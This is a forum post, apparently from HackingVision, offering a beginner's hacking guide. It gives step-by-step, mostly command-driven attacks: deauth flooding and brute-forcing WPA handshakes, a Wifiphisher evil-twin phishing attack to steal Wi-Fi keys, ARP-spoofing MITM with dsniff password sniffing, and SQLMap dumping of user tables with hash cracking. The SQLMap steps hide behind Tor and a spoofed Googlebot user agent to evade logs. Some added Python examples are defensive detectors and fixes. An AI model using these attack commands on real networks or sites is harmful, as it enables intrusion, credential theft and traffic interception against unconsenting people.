HackingVision: Beginner's Hacking Guide

This forum is for discussing free online courses
HackingVision
Gray hat hacker
Posts: 202
Joined: Tue Oct 02, 2018 9:42 pm
Location: United Kingdom


Post by HackingVision » Fri Nov 02, 2018 6:26 pm

HackingVision: Beginner's Hacking Guide

1. Operating system
2. Installing Linux for the first time
3. Updating Kali Linux for the first time
4. Hacking first Wireless Network
5. Hack Wi-Fi Networks Without Cracking Wifiphisher
6. Port Scanning
7. MITM
8. Social Engineering
9. Metasploit
10. Google Dorks
11. SQL Injection
12. Password Cracking
13. Wordlists
14. Sites That Let You Hack Them
15. DOS / DDOS
16. RAT (Remote Access Tool)
17. XSS
18. Bluetooth Hacking
19. Hacking WPS Protected WiFi Routers
20. Bios Hacking Remove Bios Passwords Laptops
21. Blind SQL Injection
22. Open Ports
23. Hacking Android Smartphone
24. Hacking Social Media Accounts
25. Scan Web Servers For Vulnerabilities Using Nikto Kali Linux
26. Hacking TOR Hidden Services Kali Linux
27. How to Use Hacking Tools Without Opening Ports
28. Prevent Man-In-The-Middle Attacks, ARP-spoofing

We have had a lot of questions about getting into ethical hacking, so to help beginners get started we have decided to share the basics with you here. (This thread will be edited regularly.)

1. Operating system

There are many different operating systems on the market, but which one is the best for hacking? This is one of the most popular questions we are asked at HackingVision. Linux is an open source operating system and is the best choice for hackers: there are lots of open source tools and hacking scripts designed to run on Linux-based operating systems. Linux has BASH (Bourne Again SHell), which makes it easy for hackers to automate commands quickly and efficiently using a bash script.

One of the most popular variations of Linux aimed at pentesting is Kali Linux. Kali Linux comes with thousands of hacking tools and scripts compiled and ready to use.

You can download Kali Linux from https://kali.org/downloads/

2. Installing Linux for the first time

There are a few ways of setting up a Linux Operating System.

Virtual Install: Linux is run from a host operating system using virtualisation software. For example, Windows 10 can run Kali Linux in a virtual environment using tools such as VirtualBox or VMware.

Live-Boot: Linux can be booted in Live mode from removable media such as a USB stick, SD card, external HDD or DVD. This means that you can boot into Linux without making changes to your existing hard drive. We always recommend that beginners use this method when booting Linux for the first time.

Full Install: Linux can be installed as your main operating system. If you are using Kali Linux it is not recommended to do a full install without creating a new user account, because Kali Linux will start as the root user, and that opens various security vulnerabilities if the root privileges are abused by a hacker.

Dual-Boot / Triple-Boot: Linux can be set up as dual boot, triple boot, etc. alongside Windows. This is a popular way of installing Linux if you use Windows alongside Linux or have more than one variation of Linux installed on your hard drive.

You can also install Kali Linux for Raspberry Pi.

Updating Kali Linux for the first time: So you have installed Kali Linux and now you get errors when you try to install software? Don't worry, this is a common problem in Kali Linux. Today I will show you how to modify your sources and update using the official Kali Linux repositories.

Warning: unofficial repositories carry risks that could affect your system. Use official and trusted repositories only; using third-party repositories could compromise or break your system in the process.

First of all we need to locate and open our sources.list file. This file stores our repository sources.

You can find the sources.list file at the following location.

Code:

/etc/apt/sources.list

Below is a list of current and prior Kali Linux repositories; choose the repository that matches the version of your Kali Linux operating system.

I'm using Kali Linux 2018.4, so I will be using the Kali Rolling repository. If you are using any version of Kali Linux from 2016 upwards you will need to use the Kali Rolling repository.

Kali Rolling Repository

Code:

deb http://http.kali.org/kali kali-rolling main contrib non-free
# For source package access, uncomment the following line
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free

Kali sana (2.0) Repositories

Code:

deb http://old.kali.org/kali sana main non-free contrib
# For source package access, uncomment the following line
# deb-src http://old.kali.org/kali sana main non-free contrib

Kali moto (1.0) Repositories

Code:

deb http://old.kali.org/kali moto main non-free contrib
# For source package access, uncomment the following line
# deb-src http://old.kali.org/kali moto main non-free contrib

So now that you know which sources you are working with, open sources.list using the following command.

Code:

nano /etc/apt/sources.list

Now that we have the sources.list file open it is time to add the new repositories.

Now remove all lines from this list of sources. (Sources.list should be blank at this stage.)

Copy the lines of the sources that correspond with your Kali Linux version and paste them into sources.list. Since I'm using Kali Linux 2018.4 I will use the following sources.

Code:

deb http://http.kali.org/kali kali-rolling main contrib non-free
# For source package access, uncomment the following line
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free

Once you are happy with your source list, save it using Ctrl+O in the nano editor.

Now open up a terminal and use the command below to update the source list. This command will clean the previously downloaded package files and update the package index, which allows us to quickly and easily query the Kali Linux repositories.

Code:

apt-get clean && apt-get update

Once the system has finished updating the package index you should be able to install packages using apt-get install successfully.
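A small checker for the step above, written for this guide as an added example (it is not part of the post): it parses the one-line deb entries shown above and flags any active entry that does not come from the official host for its suite, which is the kind of third-party source the warning above tells you to avoid. The sample file content is constructed.

```python
"""Audit a Kali sources.list against the official repository hosts.

Added example. The expected hosts are the ones named in the guide:
http.kali.org for kali-rolling, old.kali.org for the old sana and moto
releases. Anything else (a random mirror, or Debian's own suites mixed in)
is reported so the beginner can remove it before running apt-get update.
"""
import re

OFFICIAL_HOST = {
    "kali-rolling": "http.kali.org",
    "sana": "old.kali.org",
    "moto": "old.kali.org",
}

# deb|deb-src [options] <uri> <suite> <component...>
LINE_RE = re.compile(r"^(deb|deb-src)\s+(?:\[[^\]]*\]\s+)?(\S+)\s+(\S+)\s*(.*)$")


def parse_sources(text):
    """Yield (kind, uri, suite, components) for every active entry."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and comments (e.g. the deb-src lines left commented out)
        m = LINE_RE.match(line)
        if m:
            kind, uri, suite, comps = m.groups()
            yield kind, uri, suite, comps.split()


def audit_sources(text):
    """Return [(entry, problem)] for entries that should not be in a beginner's file."""
    problems = []
    for kind, uri, suite, comps in parse_sources(text):
        host = re.sub(r"^[a-z]+://", "", uri).split("/")[0]
        entry = f"{kind} {uri} {suite} {' '.join(comps)}"
        expected = OFFICIAL_HOST.get(suite)
        if expected is None:
            problems.append((entry, f"unknown suite '{suite}'; Kali 2016 and later use kali-rolling"))
        elif host != expected:
            problems.append((entry, f"suite '{suite}' should come from {expected}, not {host}"))
    return problems


# Constructed sources.list: one good rolling entry, one commented deb-src line,
# one unknown mirror, one valid old sana entry and one Debian suite that
# does not belong in a Kali install.
SAMPLE_SOURCES = """\
deb http://http.kali.org/kali kali-rolling main contrib non-free
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free
deb http://mirror.example.invalid/kali kali-rolling main contrib non-free
deb http://old.kali.org/kali sana main non-free contrib
deb http://deb.debian.org/debian jessie main
"""

if __name__ == "__main__":
    for entry, problem in audit_sources(SAMPLE_SOURCES):
        print(f"{entry}\n    -> {problem}")
```

To check a real file, read /etc/apt/sources.list into a string and pass it to audit_sources.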

https://hackingvision.com/2017/05/13/fi ... ali-linux/

Configuring Wireless Interfaces: Once you have Kali Linux it is time to configure our wireless interfaces and devices. Linux has a lot of drivers installed by default, so it is not often that you need to install drivers yourself.

To check if Linux has recognised our wireless adaptor, open up a new terminal and type the command

Code:

iwconfig

iwconfig is dedicated to wireless networking interfaces. It is used to set the parameters of the network interface, such as the wireless frequency and SSID.

Hacking first Wireless Network

There are many different types of wireless attacks. In this guide we will be discussing how to hack wireless networks using social engineering methods and also brute force methods. The tools we will be working with are listed below.

Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic. Wikipedia

Cracking Wireless Router Using Aircrack-ng with crunch

First off, this is tested on my own home network, as I don't advise hacking anyone else's WiFi but your own.

First we need to put our wireless adaptor into monitor mode. Monitor mode, or RFMON mode, allows a computer with a wireless network interface controller to monitor all traffic received from the wireless network. Unlike promiscuous mode, which is also used for packet sniffing, monitor mode allows packets to be captured without having to associate with any access point or ad hoc network first.

Let's find out the name of your card. It will often be listed in Kali Linux as wlan0, or if you are using a USB WiFi adaptor like me you can use ifconfig to find out.

Code:

# ifconfig

Image

Now that we know the name of our wireless interface we need to put our wireless card into monitor mode with airmon-ng start wlan1.

Code:

# airmon-ng start wlan1

Image

Now the wireless interface wlan1 will be put into monitor mode. We can check if our wireless interface is in monitor mode by using ifconfig.

Code:

# ifconfig

Image

As you see in the screenshot above we now have a wireless interface called wlan1mon, which tells us that airmon-ng has successfully put our wireless card into monitor mode. Now we can use airodump-ng wlan1mon to find information about nearby WiFi networks such as the BSSID and the wireless channel the target wireless network is running on.

Image

And the output.

Image

For this tutorial I'm using cablecomm-camget4. Once we have found a target wireless network we need to copy the BSSID of the network. Open a new terminal and type airodump-ng --bssid followed by the BSSID of the network, -c followed by the channel of the network (mine is channel 1), and --write followed by the ESSID of the network, CableComm-CamGet4. The ESSID is the target network's wireless name. Your command should look like this: airodump-ng --bssid 00:23:BE:47:3C:93 -c1 --write CableComm-CamGet4 wlan1mon.

Code:

# airodump-ng --bssid 00:23:BE:47:3C:93 -c1 --write CableComm-CamGet4 wlan1mon

Image

Image

Now its time to get the handshake this is the fun part. I’m going to show you two different ways to do this.

The first one is:

aireplay-ng --deauth 10000 -a 00:23:BE:47:3C:93 wlan1mon, aimed at the main network (all of its clients).

Code:

# aireplay-ng --deauth 10000 -a 00:23:BE:47:3C:93 wlan1mon

Image

The second one is:

aireplay-ng --deauth 10000 -a 00:23:BE:47:3C:93 -c AC:22:0B:43:5B:D3 wlan1mon, where -c selects one client of the network.

Code:

# aireplay-ng --deauth 10000 -a 00:23:BE:47:3C:93 -c AC:22:0B:43:5B:D3 wlan1mon

Image

Or you can do what I do and run the two attacks alongside each other.

Image

Now we need to wait for the handshake from the client.

Image

Now here comes the fun part, mostly for those with small hard drives that don't have the space for word-lists. We can use the following command if we don't have any word-lists.

Code:

# crunch 4 20 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng CableComm-CamGet4-02.cap -e CableComm-CamGet4 -w -

Piping crunch into aircrack-ng (-w - tells aircrack-ng to read candidate passwords from standard input) can save you the trouble of storing word-lists.

Image

Now it is time to open the cap file to crack the password. Let aircrack-ng run and there you go. crunch can be piped into a number of tools such as hashcat and john, and most of the brute force tools on Kali and Parrot.

https://hackingvision.com/2018/08/21/ai ... th-crunch/
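The defender's view of the two aireplay-ng commands above, as an added example that is not part of the post or of the aircrack-ng project: a wireless IDS watching the channel sees an abnormal rate of deauthentication frames sent with the AP's BSSID as source, either to the broadcast address (the first command) or to one client (the second). The frames below are constructed and reuse the post's BSSID 00:23:BE:47:3C:93 and client AC:22:0B:43:5B:D3; the sliding-window threshold is an assumption.

```python
"""Flag deauthentication floods in 802.11 management traffic (added example)."""
from collections import defaultdict
from dataclasses import dataclass

DEAUTH, DISASSOC = 0x0C, 0x0A          # 802.11 management frame subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass
class MgmtFrame:
    ts: float      # seconds since capture start
    subtype: int
    src: str       # transmitter address (a deauth attack spoofs the BSSID here)
    dst: str
    reason: int    # reason code from the frame body


def deauth_bursts(frames, window=1.0, threshold=10):
    """Return one (src, dst, total, kind) tuple per (src, dst) pair that sent
    more than `threshold` deauth/disassoc frames inside any `window` seconds.
    A single deauth is normal (a station leaving); dozens per second are not."""
    by_pair = defaultdict(list)
    for f in frames:
        if f.subtype in (DEAUTH, DISASSOC):
            by_pair[(f.src.lower(), f.dst.lower())].append(f.ts)
    alerts = []
    for (src, dst), times in by_pair.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 > threshold:
                kind = "broadcast: all clients" if dst == BROADCAST else "targeted client"
                alerts.append((src, dst, len(times), kind))
                break                          # one alert per pair is enough
    return alerts


def sample_frames():
    """Constructed capture: one legitimate deauth (reason 3, station leaving),
    then a broadcast flood and a single-client flood from the AP's address."""
    ap, client = "00:23:be:47:3c:93", "ac:22:0b:43:5b:d3"
    frames = [MgmtFrame(0.0, DEAUTH, client, ap, 3)]
    frames += [MgmtFrame(5.0 + i * 0.02, DEAUTH, ap, BROADCAST, 7) for i in range(30)]
    frames += [MgmtFrame(5.0 + i * 0.02, DEAUTH, ap, client, 7) for i in range(15)]
    return frames


if __name__ == "__main__":
    for src, dst, total, kind in deauth_bursts(sample_frames()):
        print(f"{src} -> {dst}: {total} deauth frames ({kind})")
```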

Hack Wi-Fi Networks Without Cracking Wifiphisher

In the last wireless tutorial we talked a little about hacking WPA/WPA2 passwords using brute force methods. In this tutorial, Hack Wi-Fi Networks Without Cracking with Wifiphisher, we will talk about hacking WPA/WPA2 networks without using brute force: by creating an Evil Twin access point that mimics a wireless access point, we can easily trick clients into connecting to it and leaking their credentials.

What is Wifiphisher

Wifiphisher is a wireless security tool that mounts automated, victim-customised phishing attacks against WiFi clients. This allows the attacker to obtain credentials or infect the target machine with malware. It uses a social engineering method that can quickly trick the target into unknowingly handing over their password. Unlike other methods it does not include any brute forcing of any kind. It is a quick and easy way to obtain credentials from captive portals and third-party login pages (e.g. in social networks) or WPA/WPA2 pre-shared keys.

Wifiphisher works on Kali Linux and is licensed under the GPL license.

Scenario

Let's assume that we are testing the security of our home network. We have turned off WPS and taken all the precautions to safeguard our network against attackers. We have also changed the password of the network AP to a strong password to prevent brute force attacks. However, there are others who use the same network from other devices who could potentially leak the wireless password through human error; this wireless attack relies on a little deception and trickery.

Let's assume our network has one access point that is shared amongst three users. We could use Wifiphisher to trick the clients into openly and unknowingly handing over their password: using social engineering techniques, Wifiphisher can easily create an Evil Twin access point and we can trick the clients into reconnecting to it.

Installing Wifiphisher

To install Wifiphisher clone the script using git.

In a new terminal use these commands to download and install Wifiphisher.

Code:

git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install

After the script has finished unpacking and installing resources we can start Wifiphisher.

Code:

python setup.py build && python setup.py install

Requirements

1x wireless interface that supports Managed mode.
1x wireless interface that supports Monitor mode.
Kali Linux or another Linux operating system.
Wifiphisher

First of all do a scan of nearby access points; we will be looking for clients connected to the network.

Start Wifiphisher using the following command.

Code:

wifiphisher

Alternatively use python bin/wifiphisher from Wifiphisher's script location.

Code:

python bin/wifiphisher

Specify wireless interfaces (sometimes when starting Wifiphisher it will automatically select which network interfaces to use; using the commands below we can specify which interfaces we want to use.)

Let's start: open up a new terminal and go to Wifiphisher's download location using cd, for example.

Code:

cd wifiphisher

Now start Wifiphisher, replacing wlan1 and wlan2 with the names of your wireless interfaces.

Code:

python bin/wifiphisher -aI wlan1 -jI wlan2

(-aI = AP interface, -jI = jamming interface)

Wifiphisher will now start scanning for wireless networks. From the network list choose the target wireless network using the up and down keys; when you have found the target network press Enter.

A list of phishing scenarios will appear. I will use 10, "Firmware Upgrade Page": this page displays a router configuration page without any logos or branding, asking for the WPA/WPA2 network password due to a firmware update.

After selecting the phishing scenario we want to use, Wifiphisher will start an Evil Twin access point and spawn a listener. Any clients connected to the wireless network will be deauthenticated by Wifiphisher and forced to connect to the Evil Twin access point.

After the client authenticates to the network any website that the target tries to browse to in the web browser will be diverted to a fake page prompting for credentials.

If you look at the section HTTP requests, this shows what sites connected clients are looking for. Instead of loading the website the target client is looking for, a fake phishing page created by Wifiphisher will appear.

GET = Sites clients are requesting.
POST = Post requests from connected clients. Requests with the tag POST will show POST requests that the target has sent over the network.

The POST request in the screen shot below shows credentials gathered by the web page attribute wfphshr-wpa-password. This POST request tells us that the target has entered the Wireless key “PRESH4REDK3Y”.

We have now successfully phished a wireless network passphrase using Wifiphisher. When first installed, Wifiphisher contains very limited phishing scenarios; don't worry, we can add new phishing pages or even create our own templates.

https://hackingvision.com/2017/05/17/ha ... fiphisher/

Port Scanning

MITM

Kali Linux Man in the Middle Attack Arpspoofing/Arppoisoning

In computer security, a man-in-the-middle attack (often abbreviated mitm, or the same using all capital letters) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other.

In this guide we will be working with a Linux distribution called Kali Linux as it comes with all the tools we need pre-installed.

We will be working with the following tools: Arpspoof, Urlsnarf, Driftnet.

This tutorial will work on any Linux distribution. If you don't have the tools installed you can install them using the following command.

Code:

# sudo apt-get install dsniff driftnet

On Debian-based systems arpspoof, urlsnarf and dsniff itself are all shipped in the dsniff package, so these two packages cover every tool used in this guide.

SCENARIO

Victim IP address: 192.168.43.53

Routers IP address: 192.168.43.1

Attackers Network Interface: 192.168.43.22

The first step is to configure our attacking machine to enable packet forwarding. This will allow our attacking machine to pass itself off as the router, tricking the victim machine into thinking it is talking to the router when really it is talking to the attacking machine.

To start fire up your system and open a new terminal.

Code:

# echo '1' > /proc/sys/net/ipv4/ip_forward

This will allow us to forward traffic from the attacking machine on to the victim machine and the router.

Now that IP forwarding is set up we need to set up arpspoof between the victim and the router.

To find out what your local IP address is you can use ifconfig; where it says inet is your local IP address.

Image

Now we need to discover which hosts are live on the network. To do this we will be using a tool called nmap.

Code:

# nmap -sP 192.168.43.1/24

Image

To set up arpspoof between the victim and the router, open up a command terminal and use the following commands. Note: you will need to open two separate terminals; terminator is a great tool that gives you a split view.

Code:

# arpspoof -i wlan0 -t <victimip> <routerip>

Now we need to set up arpspoof between the router and the victim.

Code:

# arpspoof -i wlan0 -t <routerip> <victimip>

Image

Now that the above steps are complete, all data sent or received by the victim machine should be forwarded through the attacking machine.

When the victim machine visits a website all of the image traffic will be forwarded through the attacking machine. You can intercept these images using driftnet; to start driftnet open up a new terminal and use the following command.

Code:

# driftnet -i wlan0

Image

If you would like to see which websites the victim is visiting you can use urlsnarf.

Urlsnarf will record all websites visited by the victim and report them back to the attacker.

Code:

# urlsnarf -i wlan0

Image

Now we will use dsniff. It will allow us to grab passwords in plain text for protocols such as FTP, Telnet, HTTP, SNMP, POP, LDAP, etc.

To use dsniff open up a new terminal and use the command dsniff.

Code:

# dsniff

Image

If you are using a wireless interface and want to grab traffic other than your own, put your wireless interface into promiscuous mode.

https://hackingvision.com/2017/02/18/ka ... le-attack/
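The defender's counterpart to the two arpspoof commands above, as an added example that is not part of the post or of dsniff: the forged "is-at" replies make the victim map the router's IP to the attacker's MAC and the router map the victim's IP to that same MAC, so a host or sensor can notice an IP whose MAC suddenly changes, and one MAC answering for the gateway plus other hosts. The replies below are constructed and use the post's scenario addresses (192.168.43.1 router, .53 victim, .22 attacker); the MAC addresses are made up.

```python
"""Detect ARP cache poisoning from a stream of ARP replies (added example)."""
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass
class ArpReply:
    ts: float        # seconds since capture start
    sender_ip: str   # the IP this reply claims to answer for
    sender_mac: str  # the MAC it says that IP "is at"


@dataclass
class ArpWatch:
    """arpwatch-style monitor: the first MAC seen for an IP is trusted, so start
    it while the network is known-clean (a poisoned first sighting would be
    learned as legitimate)."""
    gateway_ip: str
    ip_to_mac: dict = field(default_factory=dict)
    mac_to_ips: defaultdict = field(default_factory=lambda: defaultdict(set))
    alerts: list = field(default_factory=list)

    def observe(self, r: ArpReply) -> list:
        """Record one reply; return the alerts it triggered (also kept in self.alerts)."""
        new = []
        mac = r.sender_mac.lower()
        prev = self.ip_to_mac.get(r.sender_ip)
        if prev is not None and prev != mac:
            # Symptom 1: the binding flipped. The gateway flipping is the
            # classic "victim now sends everything via the attacker" case.
            sev = "HIGH" if r.sender_ip == self.gateway_ip else "MEDIUM"
            new.append((sev, f"t={r.ts}: {r.sender_ip} moved from {prev} to {mac}"))
        self.ip_to_mac[r.sender_ip] = mac
        before = len(self.mac_to_ips[mac])
        self.mac_to_ips[mac].add(r.sender_ip)
        claimed = self.mac_to_ips[mac]
        if len(claimed) > before and len(claimed) > 1 and self.gateway_ip in claimed:
            # Symptom 2: one MAC claims the gateway and at least one other IP,
            # which is exactly what running both arpspoof commands produces.
            others = sorted(claimed - {self.gateway_ip})
            new.append(("HIGH", f"t={r.ts}: {mac} answers for gateway and {others}"))
        self.alerts.extend(new)
        return new


def scan(replies, gateway_ip="192.168.43.1"):
    """Feed a whole reply list through a fresh ArpWatch and return it."""
    watch = ArpWatch(gateway_ip)
    for r in replies:
        watch.observe(r)
    return watch


# Constructed capture: three genuine replies, then the forged ones that the
# "arpspoof -t <victimip> <routerip>" and "arpspoof -t <routerip> <victimip>"
# commands from the post would generate.
SAMPLE_REPLIES = [
    ArpReply(0.0, "192.168.43.1", "aa:aa:aa:aa:aa:01"),   # router, genuine
    ArpReply(0.5, "192.168.43.53", "bb:bb:bb:bb:bb:53"),  # victim, genuine
    ArpReply(1.0, "192.168.43.22", "cc:cc:cc:cc:cc:22"),  # attacker's own address
    ArpReply(5.0, "192.168.43.1", "cc:cc:cc:cc:cc:22"),   # forged: router "is at" attacker
    ArpReply(5.0, "192.168.43.53", "cc:cc:cc:cc:cc:22"),  # forged: victim "is at" attacker
    ArpReply(7.0, "192.168.43.1", "cc:cc:cc:cc:cc:22"),   # forged again (arpspoof keeps resending)
]

if __name__ == "__main__":
    for sev, msg in scan(SAMPLE_REPLIES).alerts:
        print(sev, msg)
```

On a real host the same logic can be fed from a packet capture filtered to ARP replies, or from periodic snapshots of the ARP table.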

Social Engineering
Metasploit

10. Google Dorks

What are Google Dorks ?

Google hacking, also named Google dorking, is a web search technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites and web applications use. Dorks are not limited to Google: there are also Bing dorks, Yahoo dorks and so on, however Google dorks remain the most popular.

Google hacking uses advanced operators in the Google search engine to locate specific strings of text within search results. Google Dorks can be used for finding specific versions of vulnerable Web applications. It is normal for default installations of web applications and software to include their running version in pages they serve, for example, “Proudly Powered By WordPress”

11. SQL Injection

SQLMap Tutorial SQL Injection to hack a website and database in Kali Linux

I will demonstrate how an attacker would target and compromise a MySQL database. This allows the attacker to gain database information such as usernames and passwords and then compromise the website running on the database.

It is very important to keep SQL databases secure as they can often hold a lot of information about the website and its configuration. MySQL databases can also hold important client information and details.

What is an SQL Injection attack

SQL injection is a type of cyber attack that allows the attacker to extract database information from a target website's SQL database.

What is SQLMap

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. SQLMap provides support to enumerate users, password hashes, privileges, roles, databases, tables and columns.

Downloading SQLMAP

http://sqlmap.org/

If you are using Kali Linux SQLMap comes pre-installed.

Finding a vulnerable website

We can find vulnerable websites by using Google dorks.

What is a Google dork ? A Google dork query, sometimes just referred to as a dork, is a search string that uses advanced search operators to find information that is not readily available on a website. Google dorking, also known as Google hacking, can return information that is difficult to locate through simple search queries.

SQLi Dork List
Google Dorks List

(Don't rely solely on dorks. We are only using them to demonstrate SQL injection attacks in this tutorial.)

Testing if a website is vulnerable

We can test if a website is vulnerable by adding a ‘ to the end of the url string.

For example:

Code:

http://www.testwebsitesql.com/cgi-bin/item.cgi?item_id=15

Would become

Code:

http://www.testwebsitesql.com/cgi-bin/item.cgi?item_id=15'

Image

Difference between standard SQL & Blind SQL

When an attacker exploits an SQL injection flaw, sometimes the web application displays error messages from the database complaining that the SQL Query’s syntax is incorrect. Blind SQL injection is almost identical to normal SQL Injection, the only difference being the way the data is retrieved from the database. Blind SQL will not display syntax errors as normal SQL injection would and can be a lot harder to find.
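The quote test and the standard-versus-blind distinction above, reproduced offline as an added example (not from the post or from sqlmap): the item.cgi?item_id=15 lookup is rebuilt against an in-memory SQLite table with constructed rows, once with the parameter pasted into the SQL text (the bug), once with database errors hidden (which is what makes an injection "blind"), and once with a parameterised query plus input validation (the fix).

```python
"""Error-based vs blind SQL injection beside the parameterised fix (added example)."""
import sqlite3


def make_db():
    """Constructed catalogue table standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (item_id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)", [(15, "kettle"), (16, "toaster")])
    return conn


def lookup_vulnerable(conn, item_id):
    # The bug: the URL parameter becomes part of the SQL text, so a trailing
    # quote breaks the statement and the database reports a syntax error.
    sql = "SELECT name FROM items WHERE item_id = " + item_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_vulnerable_blind(conn, item_id):
    # Same flaw, but the application swallows database errors and answers
    # "not found". No error message leaks, so only the true/false behaviour
    # of the page differs: this is the blind case the text describes.
    try:
        return lookup_vulnerable(conn, item_id)
    except sqlite3.Error:
        return None


def lookup_safe(conn, item_id):
    # The fix: validate the parameter as an integer first, then pass it to
    # the driver separately from the SQL text so it can only be a value,
    # never part of the statement.
    try:
        value = int(item_id)
    except ValueError:
        return None
    row = conn.execute("SELECT name FROM items WHERE item_id = ?", (value,)).fetchone()
    return row[0] if row else None


def probe(item_id):
    """Return what each version of the lookup does for one item_id string."""
    conn = make_db()
    try:
        vuln = lookup_vulnerable(conn, item_id)
    except sqlite3.OperationalError as e:
        vuln = f"DB ERROR: {e}"          # the syntax error the quote test looks for
    return {
        "vulnerable": vuln,
        "blind": lookup_vulnerable_blind(conn, item_id),
        "safe": lookup_safe(conn, item_id),
    }


if __name__ == "__main__":
    # "15" is the normal request; "15'" is the quote test from the text; the
    # last two show how a blind flaw is still detectable from behaviour alone.
    for value in ("15", "15'", "15 AND 1=2", "15 AND 1=1"):
        print(repr(value), probe(value))
```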

Let's start. Open up a new terminal and use the following command to execute sqlmap.

Code:

# sqlmap

Image

Now we know SQLMap is working. We need to install Tor this will help keep our anonymity.

Tor (The Onion Router) aims to conceal its users’ identities and their online activity from surveillance and traffic analysis by separating identification and routing. It is an implementation of onion routing, which encrypts and then randomly bounces communications through a network of relays run by volunteers around the globe.

Open up a new terminal and use the following command to install Tor.

Code:

# apt-get install tor

After Tor has installed you can execute it from a terminal using "tor".

Image

Image

Image

When Tor has finished bootstrapping, leave that terminal running in the background and open up a new terminal.

Depending on our network set-up we may like to use SQLMap without Tor, with a VPN, or with Tor and a random user agent to add a little extra anonymity.

Below I have listed various ways you can list DBMS databases in SQLMap. If you don't know which command is best for you, use "Listing DBMS Using Tor + Google User Agent with SQLMap for anonymity".

Listing DBMS databases SQLMap

Code:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs

What this command does:

Listing DBMS Using Tor with SQLMap for anonymity

Add these options to your sqlmap command to use Tor alongside SQLMap.

Code:

--tor --tor-type=SOCKS5

These options tell SQLMap to send its requests through our Tor tunnel instead of from our original network address.

For example:

Code:

sqlmap -u http://target-website.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5

Listing DBMS Using Tor + Google User Agent with SQLMap for anonymity.

Code:

sqlmap -u http://target-website.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

I will be using Tor and setting a Google Crawler as a user agent for additional obscurity. Google’s crawlers will often visit websites, and are one of the least suspicious entities in the website’s error logs.

We can use this to our advantage by using the command above to mimic Googlebot.

Image

Image

SQLMap has now found a working payload and indicates that the back-end DBMS is MySQL. Now that we know that the database we are targeting is MySQL we can skip testing for other DBMSes.

SQLMap will now test the MySQL database against injection attacks and fetch database information.

Image

Now that we can see which databases are available, it is time to extract some information from them.

To list database tables we can use the following command.

Listing database tables in target MySQL Database

Code:

sqlmap -u http://www.target-website.com/cgi-bin/item.cgi?item_id=15 -D databasetable --tables --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Replace the -D databasetable option with the name of the database you are targeting (-D selects the database, -T selects a table within it).

SQLMap will now fetch the table list from the MySQL database.

Image

Listing Database Columns

Code:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Listing from Target Columns

Code:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

We have now successfully listed the contents of the database. We can then extract information from these tables by using the following command again.

Code:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Image

SQLMap will now prompt for a word list. In this tutorial I will be using the default word list so I will choose option (1) from the menu.

Image

SQLMap will then start cracking the password hashes from the SQL database tables.

Image

Image

Let's say we have tried lots of word lists and we still can't crack the hash. We can use a tool called findmyhash.

Find My Hash uses the internet to query various hash databases around the net, to find out whether the hash you are trying to crack has already been cracked by someone else in the past.

To use Find My Hash type findmyhash from a terminal.

Code:

# findmyhash

Image

Image

There are also some great online tools for hash decryption such as CrackStation https://crackstation.net/

https://hackingvision.com/2017/04/14/sq ... ali-linux/

Password Cracking
Sites That Let You Hack Them
